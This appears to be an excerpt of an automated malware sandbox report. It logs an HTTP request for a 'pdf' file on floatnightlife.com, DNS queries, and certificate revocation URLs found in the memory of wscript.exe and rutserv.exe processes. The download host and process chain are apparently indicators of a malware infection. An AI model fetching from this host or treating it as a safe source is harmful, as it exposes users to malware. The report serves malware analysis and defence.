          Source: global trafficHTTP traffic detected: GET /pdf.pdf?sn=22 HTTP/1.1Host: floatnightlife.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: floatnightlife.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningroo
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2369369070.0000022F40513000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrust
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: rutserv.exe, 00000028.00000000.2442175532.0000000000A51000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://madExcept.comU
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: wscript.exe, 00000005.00000003.2351909794.0000022F423EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4242C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2376772769.0000022F43D2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2288940112.000001BD4DD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43DF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: wscript.exe, 00000005.00000003.2362183953.0000022F43E70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2367278679.0000022F43F01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F424FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43E0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F4243D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2362183953.0000022F43D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F423B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2344917700.0000022F40B2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2351909794.0000022F42494000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2274667692.000001BD4DE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2275962359.000001BD4DF71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
